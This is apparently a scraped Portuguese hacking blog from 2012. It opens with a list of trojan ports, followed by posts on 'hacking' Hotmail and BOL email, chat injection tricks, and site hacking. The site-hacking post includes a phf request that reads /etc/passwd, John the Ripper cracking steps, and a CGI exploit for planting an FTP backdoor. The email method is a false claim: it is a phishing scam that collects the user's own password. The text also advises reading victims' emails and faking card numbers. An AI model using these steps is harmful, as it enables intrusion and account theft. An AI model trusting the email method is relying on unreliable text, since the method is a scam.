Porta   2140 - Deep Throat, The Invasor
Porta   2565 - Striker
Porta   2583 - WinCrash 2.0
Porta   2801 - Phineas Phucker
Porta   3024 - WinCrash
Porta   3129 - Masters Paradise
Porta   3150 - Deep Throat, The Invasor
Porta   3700 - Portal of Doom
Porta   4590 - ICQTrojan
Porta   4950 - IcqTrojen
Porta   5000 - Sockets de Troie
Porta   5001 - Sockets de Troie
Porta   5321 - Firehotcker
Porta   5400 - Blade Runner
Porta   5401 - Blade Runner
Porta   5402 - Blade Runner
Porta   5569 - Robo-Hack
Porta   5742 - WinCrash
Porta   6400 - The tHing
Porta   6670 - DeepThroat
Porta   6771 - DeepThroat
Porta   6883 - DeltaSource
Porta   6939 - Indoctrination
Porta   6969 - GateCrasher, Priority
Porta   7000 - Remote Grab
Porta   7300 - NetMonitor
Porta   7301 - NetMonitor
Porta   7306 - NetMonitor
Porta   7307 - NetMonitor
Porta   7308 - NetMonitor
Porta   7789 - ICKiller
Porta   9872 - Portal of Doom
Porta   9873 - Portal of Doom
Porta   9874 - Portal of Doom
Porta   9875 - Portal of Doom
Porta   9989 - iNi-Killer
Porta 10067 - Portal of Doom
Porta 10167 - Portal of Doom
Porta 11000 - Senna Spy
Porta 11223 - Progenic trojan
Porta 12223 - Hack´99 KeyLogger
Porta 12345 - GabanBus, NetBus
Porta 12346 - GabanBus, NetBus
Porta 12361 - Whack-a-mole
Porta 12362 - Whack-a-mole
Porta 16969 - Priority
Porta 20001 - Millennium
Porta 20034 - NetBus 2 Pro, NetRex Pro
Porta 21544 - GirlFriend
Porta 22222 - Prosiak 0.47
Porta 23456 - Evil FTP, Ugly FTP, WhackJob
Porta 26274 - Delta
Porta 30029 - AOLTrojan1.1
Porta 30100 - NetSphere
Porta 30303 - Sockets de Troie 2.5
Porta 30999 - Kuang
Porta 31337 - Back Orifice
Porta 31338 - Back Orifice, DeepBO
Porta 31339 - NetSpy DK
Porta 31666 - BOWhack
Porta 31787 - Hack'a'tack
Porta 33333 - Prosiak
Porta 34324 - BigGluck, TN, Tiny Telnet Server
Porta 40412 - The Spy
Porta 40421 - Master's Paradise
Porta 40422 - Master's Paradise
Porta 40423 - Master's Paradise
Porta 40426 - Master's Paradise
Porta 47262 - Delta
Porta 50505 - Sockets de Troie
Porta 50766 - Fore
Porta 53001 - Remote Windows Shutdown
Porta 61466 - Telecommando
Porta 65000 - Devil

Poderar gostar de;

Hackeando email

Thu, 08 Mar 2012 14:34:00 +0200

Hakeando E-mails

Passo 1 - Se você quer o e-mail de uma pessoa nos USA:

***you must have a hotmail account, because thats how these are designed.

For the hotmail server, you send an email to "passretrievbot@hotmail.com".

In the subject line, you MUST leave it blank, or else it simply will not work.

In the text of the message:

LINE 1: Type the username of the hotmail member you want to hack WITHOUT the @hotmail.com.

LINE 2: Type your hotmail username.

LINE 3: Type your hotmail password.

LINE 4: Type "return_lost SSF 001.110.101.104.005" (paara.. Se você não entende, vai estudar inglês - (o que é muito chato).

*** Nos USA não tem BOL.

Passo 2 - (Hotmail), se você quer hackear uma conta no Brasil, nosso atendimento é outro, então:

Envie um e-mail para recadastro_2004@hotmail.com

Solicitando um formulário de recadastro de contas.

Ex: oi. Solicito formulário de recadastro de contas. Ass: Gorete Jorgete Paulete

Daí o Hotmail te manda um formulário automático - q vem pelo e-mail do Hotmail (pra você ver como é ponta firme) hotmail@hotmail.com

Daí você preenche o formulário deste modo

Log: (seu login) - login é o seu e-mail, mas sem o @hotmail.com no final, ou seja se seu e-mail é: camaradalegal@hotmail.com... Você só coloca "camaradalegal" sem aspas.

Senha: (coloca a sua senha)

Dica de Senha (coloca a sua dica de senha)

Só q acrescente o seguinte parâmetro logo abaixo da dica de senha “return lost 001.110.101.104.005//e-mail da pessoa q você quer hackear novamente”.

Daí envia o e-mail novamente pro recadastro_2004@hotmail.com, chegando lá o sistema entenderá seu formulário de recadastro, e adentrará as informações no seu sistema, só q esse parâmetro "001.110.101 etc" vai confundir o servidor, e este enviará uma confirmação de recadastro pro seu e-mail através do hotmail@hotmail.com, só q ao final constará q você é o e-mail q você quer hackear, e a senha estará nesta confirmação de recadastro!

Eu uso direto, mas seja esperto, não mude a senha da pessoa, só leia os e-mails...

PASSO 3 - CONTA NO BOL um pouco mais simples, mas você deve Ter conta no bol, assim como no Hotmail.

Envia um e-mail solicitando um formulário de recadastro pra recadastro.online@bol.com.br

Tem um ponto final entre recadastro e online = recadastro.On-line.

Bom o formulário vem pelo e-mail do bol. Bol@bol.com.br

Daí você preenche o formulário assim:

E-mail (coloca o seu)

Senha (coloca a sua)

Dica de senha (a sua)

E abaixo disso adiciona:

Restore.reveal/asp.dx - (ai aqui você coloca o e-mail da pessoa que quer a senha, entre estes parênteses) - e-mail;server@(coloca seu e-mail aqui sem o @bol.. ex- se o seu e-mail for carudometido@bol.com.br, coloque só "carudometido).com.br/pwl = (coloca o e-mail completo da vitima)

Fácil né? A sua confirmação de recadastro vem com o e-mail e a senha da sua vitima!

Poderar gostar de;

Camuflando Seu IP (Navegando Anônimo)

Tue, 06 Mar 2012 21:50:00 +0200

Camuflando Seu IP (Navegando Anônimo)

Anonymizer

Qualquer Home-Page que você visita pode muito bem obter informações sobre você, como por exemplo: Provedor, endereço IP, sistema operacional que esta usando,navegador que esta usando e talvez o e-mail. O Anonymizer http://www.anonymizer.com age como intermediário entre o seu programa de navegação e os outros websites. Assim sendo, ele impede que o site visitado tenha acesso a qualquer tipo de informação sua. Para usar o serviço, você deve anteceder os URLs com o seguinte endereço do Anonymizer (http://www.anonymizer.com:8080). Se você quiser acessar a home-page da Microsoft, por exemplo, e não quiser que ela obtenha seus dados, você deve digitar no seu navegador:

http://www.anonymizer.com:8080/http://www.microsoft.com Pronto desta forma você poderá' até mesmo usar aquelas senhas de sites pornográficos, que você tinha sem se preocupar tanto com a sua segurança.

OBSERVAÇÃO:

O Anonymizer não é 100% seguro. Por isso se puder user tb outros tipos de camuflagem.

Poderar gostar de;

Hackeando Chat

Tue, 06 Mar 2012 21:42:00 +0200

Comandos para chat

O conteúdo a seguir serve para você utilizar em chats que aceitam imagens e troca de cores nos textos.

Burlando o novo filtro da JANE UOL News ( www.ender.net ) .
Com a mudança para o novo servidor de Chat do uol, muitos recursos acabaram, mas aqui vai uma dica em primeira mão de como entrar em qualquer sala do uol usufruindo dos recursos da Jane com as cores e criando atalho [ invadindo ] , sem precisar mais ficar de fora da sala se você ñ for assinante do uol, pegando assim as vagas destinadas p/eles.
É necessário que vc esteja com o navegador NETSCAPE 4.51 ou superior , pois este requisito é exigido pela jane plugin. Baixe o arquivo Jane v5.6 e siga os passos de instalação. Feito isso abra o netscape e adicione esta linha de comando na barra de endereço [ LOCATION ] , como mostra no exemplo abaixo:

Location

AS CONFIGURAÇÕES CONSISTE EM:
#name= Aqui vc adiciona o nick que deseja usar, lembre-se que alguns ca-
rácteres ñ são aceitos pela jane e também ñ é possível adicionar para a-
queles que frequentam as salas que suportam imagens, uma gif no nick.
// Endereço da sala, ex: batepapo4.uol.com.br
mados (2), este parâmetro ñ a necessidade de colocar o sinal de + [ mais ]
entre as palavras.
< do 7 tipos de cores:

Número Cor

0 Preta
1 Vermelha
2 Verde
3 Azul
4 Laranja
5 Branco
6 Lilás

Vale lembrar que se a conexão com o UOL estiver lenta, vai demorar um
pouco a carregar para vc entrar na sala e todos este procedimento tanto os
comandos qto ao plugin da jane ñ é aceito no Internet Explorer, indepen-
dente da sua versão e para o Netscape torno a informar que versões inferi-
ores a 4.5 também ñ é executado o plugin.
Neste caso nada posso fazer p/os usuários do IE, eu apenas disponibilizei
um acesso rápido nas salas e com recursos de cores, deixando p/trás todas
aquelas páginas de incluir nick, etc e acesso restrito p/assinantes, se a sala
suporta 30 usuários , sendo que 10 destinadas p/assinantes e vc ñ é um,
com este recurso vc terá o mesmo privilégio, he he he...

COMANDOS USADOS COM A JANE V5.6 NEWS

[font color="nome da cor"] muda as cores do texto.
[font size="número do tamanho"] muda o tamanho das letras,vai de 1 até 7.
[b] muda as letras para Bold.
[i] muda as letras para ítalo.
[mailto:coloque+uma+msg.jpg] Abre o programa de e-mail.

Web Chat Server

Com este programa você poderá ter um chat da mesma plataforma e configurações básicas dos webchats encontrados na internet como, UOL, MANDIC, STI, etc... rodando direto do seu hd, agora ficou fácil para você ter seu próprio webchat, aproveite esta dica.
O arquivo Chat Mask Server v1.1 , já está configurado e pronto para ser rodado em seu hd, porém é essencial que você siga corretamente todo procedimento de instalação.
Após baixá-lo, abra uma pasta no C:\ com o nome de ChatMask e des-
compacte o arquivo nele.
Dentro da pasta vai conter os arquivos:
chatmask.exe esse é o programa que ira rodar seu chat.
config.conf é aonde esta toda configuração do chat.
run.txt este arquivo de texto você ira copiar a linha de comando e adicionar
no prompt do DOS. Um jeito prático é você clicar no botão [ Iniciar ] , localizado na parte inferior do lado esquerdo no task-bar, e depois em [Executar]
e adicionar a linha de comando:
c:\ChatMask\chatmask.exe -c c:\ChatMask\config.conf -p 1000 -l c:\ChatMask\masklog.txt
O prompt do DOS vai abrir e informar que seu chat está aberto, basta agora abrir seu navegador e adicionar sua url:
http://seu+ip:1000/&USER=Seu+nick
Quando o chat está ativo, a pasta c:\ChatMask vai conter um arquivo chamado masklog.txt , ele é o arquivo de registro [ LOG ] , que está todas as
mensagens enviadas na sala, inclusive os reservados, que estará acessível apenas a você.
A forma prática de você sempre manter ativo o masklog.txt é abrir este arquivo no navegador Internet Explorer, e ao decorrer do chat, você sempre dá um reload para atualizar.
Outro grande recurso deste chat é a opção de exclusão do usuário, basta adicionar na barra de endereço [ LOCATION ] do seu navegador esta tag:
&MODPWD=password
Sua url ficará assim:
http://seu+ip:1000/&USER=seu+nick&MODPWD=password
Aonde está a palavra password , é a senha para você utilizar o recurso de exclusão do usuário e pode ser alterada no arquivo config.conf, basta abri-lo no WORDPAD mesmo, ir na OPÇÃO 4 e remover o " password " por um novo. Salve a alteração e se o programa enviar alguma mensagem que esta alteração poderá afetar o config , fique tranquilo, descarte e salve sem problemas, verificando apenas se o arquivo config.conf foi alterado sua extenção ".conf" para ".txt" ou ".doc" , é so renomeá-lo para voltar como antes.
Com o acesso ao MODERADOR, seu banner de mensagens vai mudar, contendo recursos de exclusão, determinando o tempo e outras opções como:
SHUTDOWN que fecha a sala e, OPEN que abre ela.
Para você fechar totalmente o chat vá até o prompt do DOS que está ativo
e segure a tecla Ctrl e depois pressione a letra C.
O Chat Mask Server v1.1 está com as configurações básicas, sem filtros, pois a intenção de adicionar filtros são quando existem problemas que os mesmos impossibilitão ou dificultão o andamento do chat, mas como isso roda no seu winchester, não teria fundamentos você querer que seu chat de PC rode como os de UNIX e suporte os mesmos, e filtros não se adiciona quando o convite é feito aos amigos e apenas frequentados por eles.

RASTREANDO IP

Para você rastrear IP numa sala de bate-papo que aceite imagens, você
primeiramente terá que usar um Servidor Pessoal , tome como exemplo o
Omni Httpd PRO v2.01 que funciona como um WebServer no seu pc, dando
uma praticidade a você de mostrar sua Home-Page e enviar fotos para um
chat.
Após ter instalado o Servidor Pessoal, execute-o. Repare que ele ficou no
lado direito inferior ao lado do relógio no seu task-bar.
Clique 1 vez no ícone, ao abrir escolha a função do menu Tools e clique em
Resolve and Update Dynamic IP para que seu número de IP seja atualizado
no box de mensagens.
Você simplismente precisa colocar a imagem desejada na pasta do pro-
grama, localizada geralmente após a instalação indicada em:
C:\httpd\HtDocs
A pasta HtDocs é aonde deve conter a imagem a ser enviada para o chat.
Envie a imagem com esta linha de comando:

lembre-se que vc adiciona [ seu IP / e o nome da imagem ] a ser enviada,
logo depois você vai notar que no box de mensagens do OmniHttpd Pro, vai
começar a mostrar além do IP do usuário, os dados do browser e versão do
sistema operacional.
Tudo que é mostrado no box de msg do Omni, fica registrado num arquivo
chamado Access.log, localizado na pasta Logs do programa.

DYNIP CLIENT V3.0

Este programa modifica seu número do IP em Hostname virtual, ex:
200.200.200.20 para remote.dynip.com
Isso tem uma grande finalidade, pois é a partir dele que você poderá es-
conder seu IP quando ultilizar o Chat Mask Server v1.1 ou o Omni Httpd PRO
v2.01, basta apenas preencher os dados no programa em [ Firt Name ] ,
[ Last Name ] , [ E-mail Address ] e adicionar o nome desejado em
[ Hostname ].
Depois clique em [ Register ] e pronto, toda vez que você utilizar ele, é so
abrir o programa e clicar em [ Reload ], mas você terá a necessidade de atu-
alizar o registro a cada 30 dias para validação do domain virtual.

MODIFICANDO SEU NICK NAME

Se você ainda não notou como faz para entrar com o nick colorido, envie
este comando para você no seu reservado:
Clique Aquí

No chat do uol, so aceita este comando:

Não adicione espaços em brancos, no lugar coloque o sinal de + . As TAGS
são sempre as mesmas:
Troca de cores.
Tamanho, que varia de 1 a 7.

Centraliza o nick.
Se você deseja fazer seu nick em degradê, baixe o programa
Color Monger
Mas lembre-se de retirar o carácter # e adicionar o sinal de + nos espaços
em branco. Com ele vai ficar fácil gerar nicks ou textos em degradê.
Uma outra forma é adicionar uma imagem no seu nick name, basta incluir
o comando de imagem.
Clique Aquí
Este comando so é aceito nos navegadores da NETSCAPE.
Os recursos das TAGS que podem ser adicionadas no comando para altera-
ção do nick são:
&USER= aonde você adiciona seu nick.
&SAYS= é a mensagem que vai sair ao entrar na sala.
&NOPIC=1 para não visualizar imagens no lugar dela vai sair [ PIC ].
&HISTORY=4 ao entrar na sala é mostrado as 4 últimas mensagens enviadas
&IGNORE=nick+name Ignora um determinado usuário na sala.
&VERBOSE=1 mostra uma linha horizontal separando cada mensagem envi-
ada na sala.
&CONFIG=1 é a soma das 6 opções mostrada acima.

CLONANDO O USUÁRIO

No chat do UOL você pode clonar um determinado usuário, enviando ape-
nas esta linha de comando se o mesmo estiver visualizando imagens:
digite+aqui+a+men-
sagem+a+ser+clonada>
Para clonar todos q estão visualizando imagens basta enviar desta maneira:

mensagem+a+ser+clonada>

DUPLICANDO UM NICK NAME

Este carácter tem 2 funções, [ DUPLICAR 1 ou + vezes um nick ] ou fazer
com que ele [ suba no topo da lista ] de nick do chat.
Simples basta adicionar isso %a0 , ele é um carácter neutro [ invisível ] ,
mas para a leitura do chat conta como se fosse um carácter válido, igual ao
[ ALT + 166 ] ou [ ].

ALTERANDO O BANNER DA SALA

Para alterar o banner da sala, você terá que entrar nela usando o comando
como seu Nick Name.
clique aqui
Tome como exemplo a gifs 2 do uol.

Incluir seu nick no Banner

%26lt%26ltinput+value=Nick+Name%26gt%26gt

Tirar o Banner
%26lt%26lttable%26gt%26gt

Piscar a palavra mensagem
%26lt%26ltblink%26gt%26gt
Visualizado apenas no Netscape.

Modificar a leitura
%26lt%26ltfont+face=wingdings%26gt%26gt

Retirar a lista de nicks
®!%26lt%26ltselect%26gt%26gt

Abrir o box de mensagens do e-mail
%26lt%26ltimg+src=mailto:®%26gt%26gt

Existem outros comandos para alteração no banner, mas grande parte a-
caba não tendo efeito a não ser provocar erros. A essência está acima.

Enviar uma mensagem no e-mail

Travando o usuário da Jane

Toques

Para facilitar sua entrada numa determinada seção no chat do UOL , use
este comando para criar um ATALHO e entrar nas opções da sua seção pre-
ferida. Tome como base a seção de [ Outras Imagens ].
Coloque este comando na barra de endereço [ LOCATION ] do seu navega-
dor.
http://chatter.uol.com.br/cgi-bin/bp/sem_cookie.cgi?nick=
Coloque+aqui+seu+nick&CONF=idhi_qu.conf&x=33&y=24
Este atalho so permite o uso de 9 caracteres , se por um acaso você cair
na parte de entrada do Chat, basta dar um [ RELOAD ] no seu navegador.
Dependendo de cada seção do UOL , consiste sempre numa configuração
diferente para acesso [ &CONF= ] , se você não frequenta a seção de [ OU-
TRAS IMAGENS ], veja abaixo outras seções e se alguma interessar, troque
apenas em idhi_qu.conf na linha de comando.

Config Destino

idhi_qu.conf Outras Imagens.
idim_he.conf heteros.
idbr_ex.conf Alô Alô Brasil.
idbares.conf Bares.
idpr_br.conf Camera Surf.
idcompu.conf Computação.
id_mtv_.conf MTV.

Poderar gostar de;

Hackeando Site

Tue, 06 Mar 2012 21:40:00 +0200

Hackeando Sites

1->INTRODUÇÃO
Por favor, saiba que hackear webpages é considerado lammer em muitas opiniões, e muito provavelmente NÃO vai te dar uma boa reputação. As pessoas sempre podem checar log's uma vez notificadas de hacking, e provavelmente o seu IP/Host pode vir à tona e no mínimo irão te processar pela lei de crimes no computador, e vc será condenado à alguns anos de prisão e terá de pagar uma BOA quantia de dinheiro. Então por favor tente não abusar do conhecimento em relação a esse assunto. Esse texto tem apenas a função de informar.

2->HACKEANDO FREE WEB PAGES
O serviço de Hosting Gratis de WebPages é feito por empresas como a Tripod and Geocities, que dá espaço de graça e ganha dinheiro com propaganda. Há maneiras de hackear essas empresas e ter acesso à todas as senhas/usernames, mas é algo que seria complexo para a maioria das pessoas. Esse método que vai ser explicado é simples engenharia social, o que não é muito dificil de se fazer. Então, não se ache um Hacker de Elite só porque vc zuou a webpage de uma pobre pessoa que apenas esqueceu algumas informações pessoais na própria Page.
Tudo que vc tem que fazer é abrir uma conta num serviço de e-mail (ex.:Hotmail) e escolher uma vítima. Vc precisará achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se possivel, o endereço dela. Resumindo... Consiga o MAXIMO de info que vc puder sobre ela.
Todas essas empresas têm um serviço de verificação para pessoas que perderam a password da sua Page. Quando vc tiver o maximo de informações sobre a pessoa, mande um e-mail para a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. Só que nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de nascimento ou endereço.
Tudo o que vc tem de fazer é mandar todas as informações que vc conseguiu, e esperar a password chegar fresquinha no seu e-mail.
Por outro lado, companhias como a Geocities são muito ocupadas para ficar respondendo e-mailsde perda de password, então eles fizeram uma pagina onde membros podem pegar suas password'z de volta. (http://www.geocities.com/help/pass_form.html).

3>HACKEANDO PAGES DE USUÁRIOS
Existem várias maneiras de hackear pages de usuários em um servidor. Eu vou tentar listar aqui o máximo de maneiras possíveis para tal, mas não espere muito em termos de informação DETALHADA.
Pegando as password's:
Beleza, suponha que vc encontrou uma page que vc quer hackear, e que esta page esteja num server em que vc não tenha acesso, e que esse servidor seja BASICO, segurança leve. Tudo bem vai.... segurança BEM LEVE! Não vou mentir... funciona melhor em sites SEM SEGURANÇA. hehehe
Nesse caso, pegar a passwd é bem fácil. Abra um telnet para o FTP do server anonimamente e olhe no diretório ETC. Pegue o arquivo chamado "passwd". Outra maneira de pega-las é achar o seu alvo, abrir um WWW-Browser e digitar:
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd DEPOIS do nome do servidor. Ex.:
http://www.vitima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
OBS: se vc não souber o que colocar no lugar de "vitima.com", SE MATE LAMMER!
Voce pode vir à pegar um arquivo passwd que não tenha contas de usuários, apenas defauts com a senha encriptada com um * no lugar. Em certos servidores com isso, vc pode ter passwd shadowed, mas em que todas as passwd files que já vi, havia um usurname como FTP e/ou NEWS que não tinham as senhas encriptadas, com um * no lugar.
Se vc achar apenas isso e NADA de senhas encriptadas, tente outra maneira de hackear o server.
Vc precisa examinar o arquivo de password'z e achar algo tipo assim:
rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/ksh
Não precisa ser EXATAMENTE assim. a unica parte REALMENTE importante é o rrc:uXDg04UkZgWOQ, que é o username(rcc) e o passwd ENCRIPTADO(uXDg04UkZgWOQ)
Pegue um programa chamado JOHN THE RIPPER, que pode ser encontrado em qualquer Site de H/P/V/A/C na Web.
Para usar o JOHN THE RIPPER é facil. Se vc quer quebrar rapidamente as senhas, vá no prompt do DOS, no diretório do programa e digite:
john passwd -single
Onde passwd é o nome da passwd file. Por exemplo, se vc salvou a passwd file como pass.txt, ficaria:
john pass.txt -single
Uma coisa importante é que a passwd file esteja no mesmo diretório que o programa.
Para obter uma lista de outros métodos de quebrar uma passwd file, digite apenas "john", no diretório do programa, para obter uma lista de comandos.
Eu acho que o JOHN THE RIPPER funciona bem sem wordlists, mas algumas pessoas discordam. Se quiser se aprofundar no programa, procure um texto que enine a usar o JOHN THE RIPPER. Este aqui ensina apenas o básico.
Para concluir... se vc pegou a password e username, DIVIRTA-SE!!!

4>HACKEANDO UMA PAGE EM UM SERVER QUE VC TB TENHA ACESSO:
Essa seção ensina como hackear uma webpage num server onde vc já tem uma conta. Esse texto foi retirado de um texto feito por Lord Somer, e já que não quero arrancar algo importante do texto, vou apenas deixa-lo aí, apenas vou traduzi-lo, pois é um método complexo, onde qualquer cagada pode zoar o esquema todo.
Exploiting Net Adminstration CGI (by Lord Somer)
#######################################
Exploiting Net Administration Cgi's
like nethosting.com
Written by:Lord Somer
Date:9/2/97
#######################################
Bom, desde que a Nethosting.com fechou ou o que quer que seja, eu pensei:"Que porra eu vou fazer antes de esquecer como eu fiz esses hackz?" O que eu vou fazer é dizer COMO eu fiz, então daí vc pode vir a encontrar o mesmo sistema em algum outro lugar ou usar para tirar suas próprias idéias para o hack.
Basicamente, a nethosting.com fez toda a sua administração via CGI'z (net-admin.nethosting.com) Primeiro, vc precisa ter uma conta nesse server, falsifique unz numeros de cartão de crédito se necessário. Depois, entre dentro da área de administração... vc vai ver umas merdas como administração de FTP, e-mail, etc.
Quem se importa com e-mails? Então, vamos ao FTP. Clique na FTP ADMINISTRATION. Vamos dizer que vc está logado como 7hsphere.com. Seu url seria algo do tipo:
http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl
Apenas mude o 7hsphere.com para qualquer domínio que o sistema tenha, ou se no chmod, apenas delete essa parte, mas deixe o sinal de +, para editar o diretório usr/home. Na administração do FTP. faça uma conta de backdoor para esse domínio criando um diretório chamado /, já que multiplas /// continuam mostrando apenas /.
Uma vez que vc tem o backdoor, DIVIRTA-SE!
Bom, a teoria básica desse tipo de exploit é que:
-O CGI passava um parâmetro onde nós mudamos para algo do nosso interesse, para editarmos infoz.
-Desde que isso usa o bagulho depois do + para verificar se este é uma conta valida logada, isso não checa a password novamente.
- Multiplas ///'z no UNIX apenas significam uma /, então, não podemos ganhar acesso à diretórios de outras pessoas ou todo o diretório /usr/home.
Eu usei este método para hackear alguns lugares conhecidos:
-7thsphere.com
-sinnerz.com
-hawkee.com
-warez950.org
-lgn.com
E muitos outros sites desconhecidos.

5>OUTRA MANEIRA DE SE HACKEAR USER PAGES
Outro método que pode funcionar com servidores mal administrados é, às vezes, quando vc abre um FTP no server, vc sai do seu diretório home, volta algunz diretórioz, e acha o diretório da vitima. Uma vez que vc tenha feito isso, vc pode acessar os arquivos HTML, salvá-los no disco, editá-los e colocar novamente dentro do dir. Os arquivos HTML podem ou não ficar dentro do FTP, mas com adminz, eles não são acessíveis para outros usuários.

6>MÉTODOS QUE NÃO SE ENCAIXAM NAS OUTRAS CATEGORIAS.
Há muitas outras maneiras de se Hackear Web Pages. A burrice das pessoas é uma boa maneira. Muitas password'z são adivinháveis se elas não são hackeáveis. Isso não é hacking, mas sim estupidez de outras pessoas. Se vc pegar o root de um server, vc pode ter acesso a TUDO no servidor. Então, se vc quer hackear um servidor de webpage, ou acessar qualquer coisa nesse servidor, vc deve pegar uma conta e rodar um exploit no servidor, mas isso é uma coisa que newbies não devem tentar enquanto não tiverem certeza do que estão fazendo.

Poderar gostar de;

Comando do MS-Dos

Tue, 06 Mar 2012 21:38:00 +0200

Comandos no MS-DOS

ASSIGN- Redireciona solicitações de operações em disco de uma
para
outra.

ATTRIB- Exibe ou altera os atributos dos arquivos 78.

BACKUP- Gera cópia de segurança de um ou mais arquivos de um
disco
para outro.

BREAK- Ativa ou desativa a verificação de ctrl+c.

CALL- chama um programa de lote a partir de um outro programa
lote.

CD- exibe ou altera o diretório atual.

CHCP- exibe ou define o número da pagina de código ativa.

CHDIR exibe ou altera o diretório atual.

CHKDSK- verifica um disco e exibe um relatório sobre seus status.

CLS- limpa a tela

COMMAND- inicia uma nova versão do interruptor de comandos do
MS-DOS.

COMP- compara o conteúdo de dois arquivos ou conjunto de
arquivos.

COPY- copia um mais arquivos para outro local.

CTTY- altere o dispositivo de terminal usado para controlar o
sistema.

DATE- Exibe ou define a data.

DEBUG- executa o debug, um programa de teste e utilitários de
edição.

DEL-exclui um ou mais arquivos.

DIR-exibe uma lista de arquivos e subdiretórios em um diretório.

DISKCOPY-Copia o conteúdo de um disco flexível Para outro.

DOSKEY-inicia o ms-dos shell.

ECHO- exibe mensagens: ativa ou desativa comandos.

EDIT - inicia o editor do ms-dos, que cria ou altera arquivos ASII.

EDLIN- inicia um editor de textos orientados por linhas.

EMM368-ativa ou desativa o suporte...memória expandida
Emm386.

ERASE- exclui um ou mais arquivos.

EXE2BIN-converte os arquivos executáveis para um formato
binário.

EXIT- sai do programa command.com.

EXPAND- expande um mais arquivos compactos.

FASTOPEN- diminui o tempo necessário para a abertura de
arquivos e
diretórios
freqüentemente utilizados.

FC- compara dois ou mais arquivos e exibe as diferenças entre
eles.

FDISK- configura o disco rígido para utilizar o MS-DOS.

GOTO- direciona o ms-dos Para uma linha nomeada em um
programa de
lote.

GRAFTABL- permite exibir um conjunto de caracteres estendidos
em um
gráfico.

GRAPHICS- carrega um programa que possa imprimir gráficos.

HELP- fornece informações de socorro sobre os comandos
MS-DOS.

IF- realiza um processamento condicional em programas de lote.

JOIN- associa uma unidade de disco a um caminho especifico.

KEYB- configura um teclado para uma linguagem especifica.

LABEL- cria altera um exclui o nome de volume de um disco.

LH- carrega um programa na área de memória superior.

LOADFIX- Carrega um programa acima dos primeiros 64K de
memória e
executa.

LOADHIGH- carrega um programa na área de memória superior.

MD- cria um diretório.

MEM- exibe a quantidade de memória utilizada e disponível no
sistema.

MIRROR- grava informações sobre um ou mais sistemas- cria um
diretório.

MORE- exibe a saída de dados uma tela por vez.

NLSFUNC- carrega as informações específicas do país .

PATH- exibe ou define um caminho de pesquisa para arquivos
executáveis.

PAUSE- suspende a execução de um programa de lote e exibe
uma
mensagem.

PRINT- imprime o arquivo de texto durante o uso de outros
comandos do
ms-dos.

PROMPT- altera o aviso de comando do ms-dos.

QBASIC- inicia o ambiente de programação do ms-dos Qbasic.

RD- remove diretório.

RECOVER- recupera as informações de disco defeituoso ou
invalido.

REM-grava comentário em arquivo de lote .

REN- renomeia um ou mais arquivos.

RENAME- renomeia um ou mais arquivos.

REPLACE- substitui arquivos.

RESTORE- restaura arquivos de segurança gerados pelo backup.

RMDIR- remove um diretório.

SCANDISK- inicia a ferramenta de reparo de disco.

SET- exibe, define, ou remove as variáveis em arquivos de lote.

SETVER- define o número da versão que o ms-dos informa um
programa.

SHARE- instala capacidade de compartilhamento e bloqueio de
arquivos
no disco
rígido.

SHIFT- altera as posições dos parâmetros substituíveis em
arquivos de lote.

SORT- Classifica entra da de dados.

SUBST- associa um caminho...uma letra de unidade ......

SYS- copia os arquivos de sistema e interpretador de comandos
do
ms-dos para um
disco especifico.

TIME- exibe ou define a hora do sistema

TREE- exibe graficamente a estrutura do diretório de uma unidade
ou
caminho

TYPE- exibe o conteúdo de um arquivo de texto

UNDELETE- recupera arquivos que tenham sido excluídos

VER- exibe a versão do ms-dos

VOL- exibe o nome de volume e o número de série do disco

XCOPY-Copia arquivos(exceto arquivos de sistema e ocultos)e
árvores de
diretórios.

Poderar gostar de;

Roubando Senha

Tue, 06 Mar 2012 21:34:00 +0200

OS MEIOS MAIS COMUNS DE SE CONSEGUIR SENHAS DE ACESSO ESTÃO LISTADOS ABAIXO :

CAVALO DE TRÓIA
O Hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.

FAREJAMENTO DE REDES
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.

ENGENHARIA SOCIAL
É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.

QUEBRA CABEÇA
Um jeito simples de desvendar senhas é a velha tentativa de erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.

INVASÃO DO SERVIDOR
O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.

DEDUÇÃO
Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
